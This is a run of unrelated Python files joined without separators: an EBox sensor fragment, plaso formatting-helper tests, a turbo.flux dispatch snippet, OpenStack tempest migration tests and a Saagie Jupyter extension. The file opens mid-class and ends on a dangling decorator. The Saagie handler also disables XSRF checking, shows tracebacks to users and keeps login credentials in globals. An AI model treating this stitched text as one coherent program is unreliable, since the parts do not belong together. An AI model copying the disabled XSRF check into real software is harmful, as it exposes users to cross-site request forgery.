        sensor_name, unit, icon = SENSOR_TYPES[sensor_type]
        self._name = sensor_name
        self._unit_of_measurement = unit
        self._icon = icon
        self.ebox_data = ebox_data
        self._state = None

    @property
    def name(self):
        """Return the name of the sensor."""
        return "{} {}".format(self.client_name, self._name)

    @property
    def state(self):
        """Return the state of the sensor."""
        return self._state

    @property
    def unit_of_measurement(self):
        """Return the unit of measurement of this entity, if any."""
        return self._unit_of_measurement

    @property
    def icon(self):
        """Icon to use in the frontend, if any."""
        return self._icon

    async def async_update(self):
        """Get the latest data from EBox and update the state."""
        await self.ebox_data.async_update()
        fresh = self.ebox_data.data
        if self.type in fresh:
            self._state = round(fresh[self.type], 2)


class EBoxData:
    """Get data from Ebox."""

    def __init__(self, username, password, httpsession):
        """Initialize the data object."""
        from pyebox import EboxClient

        self.data = {}
        self.client = EboxClient(username, password, REQUESTS_TIMEOUT, httpsession)

    @Throttle(MIN_TIME_BETWEEN_UPDATES)
    async def async_update(self):
        """Get the latest data from Ebox."""
        from pyebox.client import PyEboxError

        try:
            await self.client.fetch_data()
        except PyEboxError as exp:
            _LOGGER.error("Error on receive last EBox data: %s", exp)
        else:
            # Update data
            self.data = self.client.get_data()

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for the output module field formatting helper."""

import unittest

from dfdatetime import semantic_time as dfdatetime_semantic_time
from dfvfs.path import fake_path_spec

from plaso.containers import events
from plaso.lib import definitions
from plaso.output import formatting_helper

from tests.containers import test_lib as containers_test_lib
from tests.output import test_lib


class TestFieldFormattingHelper(formatting_helper.FieldFormattingHelper):
  """Field formatter helper for testing purposes."""

  # Maps the output field name 'zone' to its formatter callback method name;
  # exercised via GetFormattedField in the tests below.
  _FIELD_FORMAT_CALLBACKS = {'zone': '_FormatTimeZone'}


class FieldFormattingHelperTest(test_lib.OutputModuleTestCase):
  """Test the output module field formatting helper."""

  # pylint: disable=protected-access

  # Single syslog-style test event definition shared by all tests below.
  _TEST_EVENTS = [
      {'data_type': 'test:event',
       'filename': 'log/syslog.1',
       'hostname': 'ubuntu',
       'path_spec': fake_path_spec.FakePathSpec(
           location='log/syslog.1'),
       'text': (
           'Reporter <CRON> PID: 8442 (pam_unix(cron:session): session\n '
           'closed for user root)'),
       'timestamp': '2012-06-27 18:17:01',
       'timestamp_desc': definitions.TIME_DESCRIPTION_CHANGE}]

  def testFormatDateTime(self):
    """Tests the _FormatDateTime function with dynamic time."""
    output_mediator = self._CreateOutputMediator()
    test_helper = formatting_helper.FieldFormattingHelper(output_mediator)

    event, event_data, event_data_stream = (
        containers_test_lib.CreateEventFromValues(self._TEST_EVENTS[0]))

    date_time_string = test_helper._FormatDateTime(
        event, event_data, event_data_stream)
    self.assertEqual(date_time_string, '2012-06-27T18:17:01.000000+00:00')

    # Changing the output time zone shifts the formatted value accordingly.
    output_mediator.SetTimezone('Europe/Amsterdam')

    date_time_string = test_helper._FormatDateTime(
        event, event_data, event_data_stream)
    self.assertEqual(date_time_string, '2012-06-27T20:17:01.000000+02:00')

    output_mediator.SetTimezone('UTC')
    event.date_time = dfdatetime_semantic_time.InvalidTime()

    # With dynamic time, a semantic invalid time is rendered as 'Invalid'.
    date_time_string = test_helper._FormatDateTime(
        event, event_data, event_data_stream)
    self.assertEqual(date_time_string, 'Invalid')

  def testFormatDateTimeWithoutDynamicTime(self):
    """Tests the _FormatDateTime function without dynamic time."""
    output_mediator = self._CreateOutputMediator(dynamic_time=False)
    test_helper = formatting_helper.FieldFormattingHelper(output_mediator)

    event, event_data, event_data_stream = (
        containers_test_lib.CreateEventFromValues(self._TEST_EVENTS[0]))

    # Test with event.date_time
    date_time_string = test_helper._FormatDateTime(
        event, event_data, event_data_stream)
    self.assertEqual(date_time_string, '2012-06-27T18:17:01.000000+00:00')

    output_mediator.SetTimezone('Europe/Amsterdam')

    date_time_string = test_helper._FormatDateTime(
        event, event_data, event_data_stream)
    self.assertEqual(date_time_string, '2012-06-27T20:17:01.000000+02:00')

    output_mediator.SetTimezone('UTC')
    event.date_time = dfdatetime_semantic_time.InvalidTime()

    # Without dynamic time, an invalid time falls back to a zero sentinel.
    date_time_string = test_helper._FormatDateTime(
        event, event_data, event_data_stream)
    self.assertEqual(date_time_string, '0000-00-00T00:00:00.000000+00:00')

    # Test with event.timestamp
    event.date_time = None
    date_time_string = test_helper._FormatDateTime(
        event, event_data, event_data_stream)
    self.assertEqual(date_time_string, '2012-06-27T18:17:01.000000+00:00')

    event.timestamp = 0
    date_time_string = test_helper._FormatDateTime(
        event, event_data, event_data_stream)
    self.assertEqual(date_time_string, '0000-00-00T00:00:00.000000+00:00')

    # -9223372036854775808 is the minimum signed 64-bit value, used here as
    # a "not set" timestamp.
    event.timestamp = -9223372036854775808
    date_time_string = test_helper._FormatDateTime(
        event, event_data, event_data_stream)
    self.assertEqual(date_time_string, '0000-00-00T00:00:00.000000+00:00')

  def testFormatDisplayName(self):
    """Tests the _FormatDisplayName function."""
    output_mediator = self._CreateOutputMediator()
    test_helper = formatting_helper.FieldFormattingHelper(output_mediator)

    event, event_data, event_data_stream = (
        containers_test_lib.CreateEventFromValues(self._TEST_EVENTS[0]))
    display_name_string = test_helper._FormatDisplayName(
        event, event_data, event_data_stream)
    self.assertEqual(display_name_string, 'FAKE:log/syslog.1')

  def testFormatFilename(self):
    """Tests the _FormatFilename function."""
    output_mediator = self._CreateOutputMediator()
    test_helper = formatting_helper.FieldFormattingHelper(output_mediator)

    event, event_data, event_data_stream = (
        containers_test_lib.CreateEventFromValues(self._TEST_EVENTS[0]))
    filename_string = test_helper._FormatFilename(
        event, event_data, event_data_stream)
    self.assertEqual(filename_string, 'log/syslog.1')

  def testFormatHostname(self):
    """Tests the _FormatHostname function."""
    output_mediator = self._CreateOutputMediator()
    test_helper = formatting_helper.FieldFormattingHelper(output_mediator)

    event, event_data, event_data_stream = (
        containers_test_lib.CreateEventFromValues(self._TEST_EVENTS[0]))
    hostname_string = test_helper._FormatHostname(
        event, event_data, event_data_stream)
    self.assertEqual(hostname_string, 'ubuntu')

  def testFormatInode(self):
    """Tests the _FormatInode function."""
    output_mediator = self._CreateOutputMediator()
    test_helper = formatting_helper.FieldFormattingHelper(output_mediator)

    event, event_data, event_data_stream = (
        containers_test_lib.CreateEventFromValues(self._TEST_EVENTS[0]))
    # The test event has no inode, hence the '-' placeholder.
    inode_string = test_helper._FormatInode(
        event, event_data, event_data_stream)
    self.assertEqual(inode_string, '-')

  def testFormatMACB(self):
    """Tests the _FormatMACB function."""
    output_mediator = self._CreateOutputMediator()
    test_helper = formatting_helper.FieldFormattingHelper(output_mediator)

    event, event_data, event_data_stream = (
        containers_test_lib.CreateEventFromValues(self._TEST_EVENTS[0]))
    # TIME_DESCRIPTION_CHANGE maps to the 'C' position of the MACB string.
    macb_string = test_helper._FormatMACB(event, event_data, event_data_stream)
    self.assertEqual(macb_string, '..C.')

  def testFormatMessage(self):
    """Tests the _FormatMessage function."""
    output_mediator = self._CreateOutputMediator()

    # Message formatting requires the message formatter definitions from the
    # test data directory.
    formatters_directory_path = self._GetTestFilePath(['formatters'])
    output_mediator.ReadMessageFormattersFromDirectory(
        formatters_directory_path)

    test_helper = formatting_helper.FieldFormattingHelper(output_mediator)

    event, event_data, event_data_stream = (
        containers_test_lib.CreateEventFromValues(self._TEST_EVENTS[0]))

    message_string = test_helper._FormatMessage(
        event, event_data, event_data_stream)

    expected_message_string = (
        'Reporter <CRON> PID: 8442 (pam_unix(cron:session): session closed '
        'for user root)')
    self.assertEqual(message_string, expected_message_string)

  def testFormatMessageShort(self):
    """Tests the _FormatMessageShort function."""
    output_mediator = self._CreateOutputMediator()

    formatters_directory_path = self._GetTestFilePath(['formatters'])
    output_mediator.ReadMessageFormattersFromDirectory(
        formatters_directory_path)

    test_helper = formatting_helper.FieldFormattingHelper(output_mediator)

    event, event_data, event_data_stream = (
        containers_test_lib.CreateEventFromValues(self._TEST_EVENTS[0]))

    message_short_string = test_helper._FormatMessageShort(
        event, event_data, event_data_stream)

    expected_message_short_string = (
        'Reporter <CRON> PID: 8442 (pam_unix(cron:session): session closed '
        'for user root)')
    self.assertEqual(message_short_string, expected_message_short_string)

  def testFormatSource(self):
    """Tests the _FormatSource function."""
    output_mediator = self._CreateOutputMediator()
    test_helper = formatting_helper.FieldFormattingHelper(output_mediator)

    event, event_data, event_data_stream = (
        containers_test_lib.CreateEventFromValues(self._TEST_EVENTS[0]))

    source_string = test_helper._FormatSource(
        event, event_data, event_data_stream)

    self.assertEqual(source_string, 'Test log file')

  def testFormatSourceShort(self):
    """Tests the _FormatSourceShort function."""
    output_mediator = self._CreateOutputMediator()
    test_helper = formatting_helper.FieldFormattingHelper(output_mediator)

    event, event_data, event_data_stream = (
        containers_test_lib.CreateEventFromValues(self._TEST_EVENTS[0]))

    source_short_string = test_helper._FormatSourceShort(
        event, event_data, event_data_stream)

    self.assertEqual(source_short_string, 'FILE')

  def testFormatTag(self):
    """Tests the _FormatTag function."""
    output_mediator = self._CreateOutputMediator()
    test_helper = formatting_helper.FieldFormattingHelper(output_mediator)

    # A missing event tag is rendered as the '-' placeholder.
    tag_string = test_helper._FormatTag(None)
    self.assertEqual(tag_string, '-')

    event_tag = events.EventTag()
    event_tag.AddLabel('one')
    event_tag.AddLabel('two')

    tag_string = test_helper._FormatTag(event_tag)
    self.assertEqual(tag_string, 'one two')

  def testFormatTime(self):
    """Tests the _FormatTime function."""
    output_mediator = self._CreateOutputMediator()
    test_helper = formatting_helper.FieldFormattingHelper(output_mediator)

    event, event_data, event_data_stream = (
        containers_test_lib.CreateEventFromValues(self._TEST_EVENTS[0]))

    # Test with event.date_time
    time_string = test_helper._FormatTime(
        event, event_data, event_data_stream)
    self.assertEqual(time_string, '18:17:01')

    output_mediator.SetTimezone('Europe/Amsterdam')

    time_string = test_helper._FormatTime(
        event, event_data, event_data_stream)
    self.assertEqual(time_string, '20:17:01')

    output_mediator.SetTimezone('UTC')

    # Test with event.timestamp
    event.date_time = None
    time_string = test_helper._FormatTime(
        event, event_data, event_data_stream)
    self.assertEqual(time_string, '18:17:01')

    # Unset or minimal timestamps yield the '--:--:--' placeholder.
    event.timestamp = 0
    time_string = test_helper._FormatTime(
        event, event_data, event_data_stream)
    self.assertEqual(time_string, '--:--:--')

    event.timestamp = -9223372036854775808
    time_string = test_helper._FormatTime(
        event, event_data, event_data_stream)
    self.assertEqual(time_string, '--:--:--')

  def testFormatTimeZone(self):
    """Tests the _FormatTimeZone function."""
    output_mediator = self._CreateOutputMediator()
    test_helper = formatting_helper.FieldFormattingHelper(output_mediator)

    event, event_data, event_data_stream = (
        containers_test_lib.CreateEventFromValues(self._TEST_EVENTS[0]))
    zone_string = test_helper._FormatTimeZone(
        event, event_data, event_data_stream)
    self.assertEqual(zone_string, 'UTC')

  def testFormatUsername(self):
    """Tests the _FormatUsername function."""
    output_mediator = self._CreateOutputMediator()
    test_helper = formatting_helper.FieldFormattingHelper(output_mediator)

    event, event_data, event_data_stream = (
        containers_test_lib.CreateEventFromValues(self._TEST_EVENTS[0]))
    # The test event carries no username, hence the '-' placeholder.
    username_string = test_helper._FormatUsername(
        event, event_data, event_data_stream)
    self.assertEqual(username_string, '-')

  # TODO: add coverage for _ReportEventError

  def testGetFormattedField(self):
    """Tests the GetFormattedField function."""
    output_mediator = self._CreateOutputMediator()
    # Uses the subclass with the 'zone' callback registered above.
    test_helper = TestFieldFormattingHelper(output_mediator)

    event, event_data, event_data_stream = (
        containers_test_lib.CreateEventFromValues(self._TEST_EVENTS[0]))
    zone_string = test_helper.GetFormattedField(
        'zone', event, event_data, event_data_stream, None)
    self.assertEqual(zone_string, 'UTC')


# Allow running this test module directly.
if __name__ == '__main__':
  unittest.main()

from turbo.flux import Mutation, register, dispatch, register_dispatch

import mutation_types

@register_dispatch('user', mutation_types.INCREASE)
def increase(rank):
    # Body intentionally empty: register_dispatch presumably generates the
    # dispatch of the INCREASE mutation to the 'user' store — TODO confirm
    # against turbo.flux documentation.
    pass


def decrease(rank):
    # Undecorated variant: dispatches the DECREASE mutation to the 'user'
    # store explicitly and returns the dispatch result.
    return dispatch('user', mutation_types.DECREASE, rank)


@register_dispatch('metric', 'inc_qps')
def inc_qps():
    # Registered against the 'metric' store with a plain string mutation
    # type instead of a mutation_types constant.
    pass
# Copyright 2014 NEC Corporation.  All rights reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

import testtools

from tempest.api.compute import base
from tempest.common import waiters
from tempest import config
from tempest.lib.common.utils import data_utils
from tempest.lib import decorators
from tempest.lib import exceptions

# Tempest configuration singleton.
CONF = config.CONF


class MigrationsAdminTest(base.BaseV2ComputeAdminTest):
    """Test migration operations supported by admin user"""

    @classmethod
    def setup_clients(cls):
        super(MigrationsAdminTest, cls).setup_clients()
        # Listing migrations requires the admin migrations client.
        cls.client = cls.os_admin.migrations_client

    @decorators.idempotent_id('75c0b83d-72a0-4cf8-a153-631e83e7d53f')
    def test_list_migrations(self):
        """Test admin user can get the migrations list"""
        self.client.list_migrations()

    @decorators.idempotent_id('1b512062-8093-438e-b47a-37d2f597cd64')
    @testtools.skipUnless(CONF.compute_feature_enabled.resize,
                          'Resize not available.')
    def test_list_migrations_in_flavor_resize_situation(self):
        """Admin can get the migrations list containing the resized server"""
        server = self.create_test_server(wait_until="ACTIVE")
        server_id = server['id']

        self.resize_server(server_id, self.flavor_ref_alt)

        body = self.client.list_migrations()['migrations']

        # The resized server must appear among the recorded migrations.
        instance_uuids = [x['instance_uuid'] for x in body]
        self.assertIn(server_id, instance_uuids)

    def _flavor_clean_up(self, flavor_id):
        # Delete the flavor and wait for the deletion to complete; a flavor
        # that is already gone (NotFound) is treated as success.
        try:
            self.admin_flavors_client.delete_flavor(flavor_id)
            self.admin_flavors_client.wait_for_resource_deletion(flavor_id)
        except exceptions.NotFound:
            pass

    @decorators.idempotent_id('33f1fec3-ba18-4470-8e4e-1d888e7c3593')
    @testtools.skipUnless(CONF.compute_feature_enabled.resize,
                          'Resize not available.')
    def test_resize_server_revert_deleted_flavor(self):
        """Test reverting resized server with original flavor deleted

        Tests that we can revert the resize on an instance whose original
        flavor has been deleted.
        """

        # First we have to create a flavor that we can delete so make a copy
        # of the normal flavor from which we'd create a server.
        flavor = self.admin_flavors_client.show_flavor(
            self.flavor_ref)['flavor']
        flavor = self.admin_flavors_client.create_flavor(
            name=data_utils.rand_name('test_resize_flavor_'),
            ram=flavor['ram'],
            disk=flavor['disk'],
            vcpus=flavor['vcpus']
        )['flavor']
        self.addCleanup(self._flavor_clean_up, flavor['id'])

        # Set extra specs same as self.flavor_ref for the created flavor,
        # because the environment may need some special extra specs to
        # create server which should have been contained in
        # self.flavor_ref.
        extra_spec_keys = self.admin_flavors_client.list_flavor_extra_specs(
            self.flavor_ref)['extra_specs']
        if extra_spec_keys:
            self.admin_flavors_client.set_flavor_extra_spec(
                flavor['id'], **extra_spec_keys)

        # Now boot a server with the copied flavor.
        server = self.create_test_server(
            wait_until='ACTIVE', flavor=flavor['id'])
        server = self.servers_client.show_server(server['id'])['server']

        # If 'id' not in server['flavor'], we can only compare the flavor
        # details, so here we should save the to-be-deleted flavor's details,
        # for the flavor comparison after the server resizing.
        if not server['flavor'].get('id'):
            pre_flavor = {}
            body = self.flavors_client.show_flavor(flavor['id'])['flavor']
            for key in ['name', 'ram', 'vcpus', 'disk']:
                pre_flavor[key] = body[key]

        # Delete the flavor we used to boot the instance.
        self._flavor_clean_up(flavor['id'])

        # Now resize the server and wait for it to go into verify state.
        self.servers_client.resize_server(server['id'], self.flavor_ref_alt)
        waiters.wait_for_server_status(self.servers_client, server['id'],
                                       'VERIFY_RESIZE')

        # Now revert the resize, it should be OK even though the original
        # flavor used to boot the server was deleted.
        self.servers_client.revert_resize_server(server['id'])
        waiters.wait_for_server_status(self.servers_client, server['id'],
                                       'ACTIVE')

        server = self.servers_client.show_server(server['id'])['server']
        if server['flavor'].get('id'):
            msg = ('server flavor is not same as flavor!')
            self.assertEqual(flavor['id'], server['flavor']['id'], msg)
        else:
            self.assertEqual(pre_flavor['name'],
                             server['flavor']['original_name'],
                             "original_name in server flavor is not same as "
                             "flavor name!")
            for key in ['ram', 'vcpus', 'disk']:
                msg = ('attribute %s in server flavor is not same as '
                       'flavor!' % key)
                self.assertEqual(pre_flavor[key], server['flavor'][key], msg)

    def _test_cold_migrate_server(self, revert=False):
        # Cold migration needs a second compute node to move the server to.
        if CONF.compute.min_compute_nodes < 2:
            msg = "Less than 2 compute nodes, skipping multinode tests."
            raise self.skipException(msg)

        server = self.create_test_server(wait_until="ACTIVE")
        src_host = self.get_host_for_server(server['id'])

        self.admin_servers_client.migrate_server(server['id'])

        waiters.wait_for_server_status(self.servers_client,
                                       server['id'], 'VERIFY_RESIZE')

        # Reverting should land the server back on the source host; a
        # confirmed migration should leave it on a different host.
        if revert:
            self.servers_client.revert_resize_server(server['id'])
            assert_func = self.assertEqual
        else:
            self.servers_client.confirm_resize_server(server['id'])
            assert_func = self.assertNotEqual

        waiters.wait_for_server_status(self.servers_client,
                                       server['id'], 'ACTIVE')
        dst_host = self.get_host_for_server(server['id'])
        assert_func(src_host, dst_host)

    @decorators.idempotent_id('4bf0be52-3b6f-4746-9a27-3143636fe30d')
    @testtools.skipUnless(CONF.compute_feature_enabled.cold_migration,
                          'Cold migration not available.')
    def test_cold_migration(self):
        """Test cold migrating server and then confirm the migration"""
        self._test_cold_migrate_server(revert=False)

    @decorators.idempotent_id('caa1aa8b-f4ef-4374-be0d-95f001c2ac2d')
    @testtools.skipUnless(CONF.compute_feature_enabled.cold_migration,
                          'Cold migration not available.')
    def test_revert_cold_migration(self):
        """Test cold migrating server and then revert the migration"""
        self._test_cold_migrate_server(revert=True)

from functools import wraps
import json
import os
import traceback
import validators

from jinja2 import Environment, PackageLoader
from notebook.utils import url_path_join
from notebook.base.handlers import IPythonHandler
import requests
from requests.auth import HTTPBasicAuth


# Jinja2 environment loading templates bundled with the 'saagie' package.
env = Environment(
    loader=PackageLoader('saagie', 'jinja2'),
)

SAAGIE_ROOT_URL = os.environ.get("SAAGIE_ROOT_URL", None)
# NOTE(review): the globals below are None placeholders; presumably they are
# populated during extension setup elsewhere in this module — confirm.
SAAGIE_USERNAME = None
PLATFORMS_URL = None
SAAGIE_BASIC_AUTH_TOKEN = None
JOBS_URL_PATTERN = None
JOB_URL_PATTERN = None
JOB_UPGRADE_URL_PATTERN = None
SCRIPT_UPLOAD_URL_PATTERN = None


def get_absolute_saagie_url(saagie_url):
    """Return an absolute URL, prefixing the Saagie root for relative paths."""
    if not saagie_url.startswith('/'):
        # Already absolute (or at least not root-relative); pass through.
        return saagie_url
    return SAAGIE_ROOT_URL + saagie_url


class ResponseError(Exception):
    """Exception carrying an HTTP status code to send back to the client."""

    def __init__(self, status_code):
        super(ResponseError, self).__init__(status_code)
        self.status_code = status_code


class SaagieHandler(IPythonHandler):
    """Tornado handler dispatching /saagie requests to the view registry."""

    def handle_request(self, method):
        """Render the view named in the request arguments and send the page.

        Responds 404 when no 'view' argument is present or the view raises
        ResponseError(404); any other exception renders an error page (500).
        """
        # Tornado supplies each argument as a list of byte strings; keep the
        # first value of each, decoded.
        data = {k: v[0].decode() for k, v in self.request.arguments.items()}
        if 'view' not in data:
            self.send_error(404)
            return
        view_name = data.pop('view')
        notebook_path = data.pop('notebook_path', None)
        notebook_json = data.pop('notebook_json', None)
        notebook = Notebook(notebook_path, notebook_json)
        try:
            template_name, template_data = views.render(
                view_name, notebook=notebook, data=data, method=method)
        except ResponseError as e:
            self.send_error(e.status_code)
            return
        except:
            # Any other failure: show the traceback in an error page.
            template_name = 'internal_error.html'
            template_data = {'error': traceback.format_exc()}
            self.set_status(500)
        template_data.update(
            notebook=notebook,
        )
        template = env.get_template(template_name)
        self.finish(template.render(template_data))

    def get(self):
        self.handle_request('GET')

    def post(self):
        self.handle_request('POST')

    def check_xsrf_cookie(self):
        # XSRF protection deliberately disabled for this extension's endpoint.
        return


class SaagieCheckHandler(IPythonHandler):
    """Health-check endpoint: answers an empty 200 so the front-end can
    detect that the extension is installed."""

    def get(self):
        self.finish()


class SaagieJobRun:
    """Snapshot of a single execution (instance) of a SaagieJob."""

    def __init__(self, job, run_data):
        self.job = job
        self.id = run_data['id']
        self.status = run_data['status']
        # Log streams default to empty strings when the API omits them.
        self.stdout = run_data.get('logs_out', '')
        self.stderr = run_data.get('logs_err', '')


class SaagieJob:
    """Wrapper around one Saagie job as returned by the Saagie REST API."""

    @classmethod
    def from_id(cls, notebook, platform_id, job_id):
        """Fetch the job's data from the API and wrap it."""
        job_data = requests.get(JOB_URL_PATTERN % (platform_id, job_id),
                                auth=SAAGIE_BASIC_AUTH_TOKEN).json()
        return cls(notebook, job_data)

    def __init__(self, notebook, job_data):
        self.notebook = notebook
        self.data = job_data
        self.id = job_data['id']
        self.name = job_data['name']
        self.platform_id = job_data['platform_id']
        self.capsule_type = job_data['capsule_code']
        # Populated by fetch_logs() once a finished run exists.
        self.last_run = None

    def set_as_current(self):
        """Mark this job as the notebook's active job."""
        self.notebook.current_job = self

    @property
    def url(self):
        """API URL of this job."""
        return (JOBS_URL_PATTERN + '/%s') % (self.platform_id, self.id)

    @property
    def admin_url(self):
        """URL of this job's page in the Saagie manager UI."""
        return get_absolute_saagie_url('/#/manager/%s/job/%s'
                                       % (self.platform_id, self.id))

    @property
    def logs_url(self):
        """URL of this job's logs page in the manager UI."""
        return self.admin_url + '/logs'

    @property
    def is_started(self):
        """True once fetch_logs() has recorded a finished run."""
        return self.last_run is not None

    def fetch_logs(self):
        """Refresh ``last_run`` when the job's last instance has finished."""
        job_data = requests.get(self.url, auth=SAAGIE_BASIC_AUTH_TOKEN).json()
        run_data = job_data.get('last_instance')
        if run_data is None or run_data['status'] not in ('SUCCESS', 'FAILED'):
            return
        detail_url = get_absolute_saagie_url('/api/v1/jobtask/%s'
                                            % run_data['id'])
        run_data = requests.get(detail_url, auth=SAAGIE_BASIC_AUTH_TOKEN).json()
        self.last_run = SaagieJobRun(self, run_data)

    @property
    def details_template_name(self):
        """Template used to show this job's details."""
        return 'include/python_job_details.html'

    def __str__(self):
        return self.name

    def __eq__(self, other):
        # None never compares equal to a job.
        if other is None:
            return False
        return (self.platform_id, self.id) == (other.platform_id, other.id)

    def __lt__(self, other):
        # Jobs sort by id; None sorts before everything.
        if other is None:
            return False
        return self.id < other.id


class SaagiePlatform:
    """One Saagie platform and the capsule (job) types it offers."""

    SUPPORTED_CAPSULE_TYPES = {'python'}

    def __init__(self, notebook, platform_data):
        self.notebook = notebook
        self.id = platform_data['id']
        self.name = platform_data['name']
        self.capsule_types = {capsule['code']
                              for capsule in platform_data['capsules']}

    @property
    def is_supported(self):
        """True when the platform offers at least one supported capsule type."""
        return bool(self.capsule_types & self.SUPPORTED_CAPSULE_TYPES)

    def get_jobs(self):
        """Fetch this platform's processing jobs of a supported capsule type."""
        if not self.is_supported:
            return []

        jobs_data = requests.get(JOBS_URL_PATTERN % self.id,
                                 auth=SAAGIE_BASIC_AUTH_TOKEN).json()
        return [SaagieJob(self.notebook, job_data)
                for job_data in jobs_data
                if job_data['category'] == 'processing'
                and job_data['capsule_code'] in self.SUPPORTED_CAPSULE_TYPES]

    def __eq__(self, other):
        return self.id == other.id


class Notebook:
    """A notebook known to the extension, cached per path.

    Instances are cached by path so that per-notebook state such as
    ``current_job`` survives across successive HTTP requests.
    """

    # Cache of instances keyed by notebook path (never evicted).
    CACHE = {}

    def __new__(cls, path, json_data):
        # BUG FIX: the parameter was named `json`, shadowing the json module
        # (harmless here but misleading); renamed to match __init__.
        if path in cls.CACHE:
            return cls.CACHE[path]
        cls.CACHE[path] = new = super(Notebook, cls).__new__(cls)
        return new

    def __init__(self, path, json_data):
        if path is None:
            path = 'Untitled.ipynb'
        if json_data is None:
            # Minimal empty-notebook payload with a python3 kernel.
            json_data = json.dumps({
                'cells': [],
                'metadata': {'kernelspec': {'name': 'python3'}}})
        self.path = path
        self.json = json.loads(json_data)
        # In cached instances, current_job is already defined.
        if not hasattr(self, 'current_job'):
            self.current_job = None

    @property
    def name(self):
        """Notebook file name without directory or extension."""
        return os.path.splitext(os.path.basename(self.path))[0]

    @property
    def kernel_name(self):
        return self.json['metadata']['kernelspec']['name']

    @property
    def kernel_display_name(self):
        return self.json['metadata']['kernelspec']['display_name']

    def get_code_cells(self):
        """Return the source of every code cell, in notebook order."""
        return [cell['source'] for cell in self.json['cells']
                if cell['cell_type'] == 'code']

    def get_code(self, indices=None):
        """Join the selected code cells (all of them when indices is None)."""
        cells = self.get_code_cells()
        if indices is None:
            return '\n\n\n'.join(cells)
        return '\n\n\n'.join([cells[i] for i in indices])

    def get_platforms(self):
        """Fetch all Saagie platforms visible to the logged-in user."""
        return [SaagiePlatform(self, platform_data)
                for platform_data in requests.get(PLATFORMS_URL, auth=SAAGIE_BASIC_AUTH_TOKEN).json()]


class ViewsCollection(dict):
    """Registry mapping view names to view callables."""

    def add(self, func):
        """Register ``func`` under its function name; usable as a decorator."""
        self[func.__name__] = func
        return func

    def render(self, view_name, notebook, data=None, method='GET', **kwargs):
        """Call the named view and return (template_name, template_data).

        A view may return just a context dict (template name is derived from
        the view's name) or an explicit (template_name, context) tuple.
        Raises ResponseError(404) for an unknown view name.
        """
        if data is None:
            data = {}
        try:
            # BUG FIX: looked up the module-global `views` instead of self,
            # which broke any ViewsCollection other than the global instance.
            view = self[view_name]
        except KeyError:
            raise ResponseError(404)
        template_data = view(method, notebook, data, **kwargs)
        if isinstance(template_data, tuple):
            template_name, template_data = template_data
        else:
            template_name = view.__name__ + '.html'
        return template_name, template_data


# Global view registry used by SaagieHandler.handle_request.
views = ViewsCollection()


@views.add
def modal(method, notebook, data):
    """Base modal dialog view; all context comes from the template itself."""
    return {}

def clear_basic_auth_token():
    """Forget the stored Basic Auth token, forcing a fresh login next time."""
    global SAAGIE_BASIC_AUTH_TOKEN
    SAAGIE_BASIC_AUTH_TOKEN = None

# Init an empty Basic Auth token on first launch
clear_basic_auth_token()

def is_logged():
    """Return True when a Saagie URL and a still-valid auth token are known.

    An invalid/rejected token is cleared so the next request triggers a
    new login phase.
    """
    if SAAGIE_ROOT_URL is None or SAAGIE_BASIC_AUTH_TOKEN is None:
        return False
    # Probe the current-user endpoint to check the token is still accepted.
    logged_in = False
    try:
        response = requests.get(SAAGIE_ROOT_URL + '/api/v1/user-current',
                                auth=SAAGIE_BASIC_AUTH_TOKEN,
                                allow_redirects=False)
        logged_in = response.ok
    except (requests.ConnectionError, requests.RequestException,
            requests.HTTPError, requests.Timeout) as err:
        print ('Error while trying to connect to Saagie: ', err)

    if logged_in is not True:
        # Remove Basic Auth token from globals. It will force a new login phase.
        clear_basic_auth_token()

    return logged_in

def define_globals(saagie_root_url, saagie_username):
    """Derive and store the module-level Saagie URLs from the root URL.

    Does nothing when ``saagie_root_url`` is None.
    """
    if saagie_root_url is None:
        return
    global SAAGIE_ROOT_URL, SAAGIE_USERNAME, PLATFORMS_URL, \
        JOBS_URL_PATTERN, JOB_URL_PATTERN, JOB_UPGRADE_URL_PATTERN, \
        SCRIPT_UPLOAD_URL_PATTERN
    SAAGIE_USERNAME = saagie_username
    SAAGIE_ROOT_URL = saagie_root_url.strip("/")
    # All endpoint patterns hang off the platform collection.
    PLATFORMS_URL = SAAGIE_ROOT_URL + '/api/v1/platform'
    JOBS_URL_PATTERN = PLATFORMS_URL + '/%s/job'
    JOB_URL_PATTERN = JOBS_URL_PATTERN + '/%s'
    JOB_UPGRADE_URL_PATTERN = JOBS_URL_PATTERN + '/%s/version'
    SCRIPT_UPLOAD_URL_PATTERN = JOBS_URL_PATTERN + '/upload'

@views.add
def login_form(method, notebook, data):
    """Login view: on POST, validate the URL and attempt a Basic Auth login.

    On success renders the capsule type chooser; on failure re-renders the
    form with an error message.  On GET, skips straight to the chooser when
    an existing session is still valid.
    """
    if method == 'POST':
        # check if the given Saagie URL is well formed
        if not validators.url(data['saagie_root_url']):
            return {'error': 'Invalid URL', 'saagie_root_url': data['saagie_root_url'] or '', 'username': data['username'] or ''}

        define_globals(data['saagie_root_url'], data['username'])

        try:
            basic_token = HTTPBasicAuth(data['username'], data['password'])
            current_user_response = requests.get(SAAGIE_ROOT_URL + '/api/v1/user-current', auth=basic_token, allow_redirects=False)

            if current_user_response.ok:
                # Login succeeded, keep the basic token for future API calls
                global SAAGIE_BASIC_AUTH_TOKEN
                SAAGIE_BASIC_AUTH_TOKEN = basic_token

        except (requests.ConnectionError, requests.RequestException, requests.HTTPError, requests.Timeout) as err:
            print ('Error while trying to connect to Saagie: ', err)
            return {'error': 'Connection error', 'saagie_root_url': SAAGIE_ROOT_URL, 'username': SAAGIE_USERNAME or ''}

        if SAAGIE_BASIC_AUTH_TOKEN is not None:
            return views.render('capsule_type_chooser', notebook)

        return {'error': 'Invalid URL, username or password.', 'saagie_root_url': SAAGIE_ROOT_URL, 'username': SAAGIE_USERNAME or ''}
    if is_logged():
        return views.render('capsule_type_chooser', notebook)
    return {'error': None, 'saagie_root_url': SAAGIE_ROOT_URL or '', 'username': SAAGIE_USERNAME or ''}


def login_required(view):
    """View decorator: show the login form unless a valid session exists."""
    @wraps(view)
    def wrapper(method, notebook, data, *args, **kwargs):
        if is_logged():
            return view(method, notebook, data, *args, **kwargs)
        return views.render('login_form', notebook)
    return wrapper


@views.add
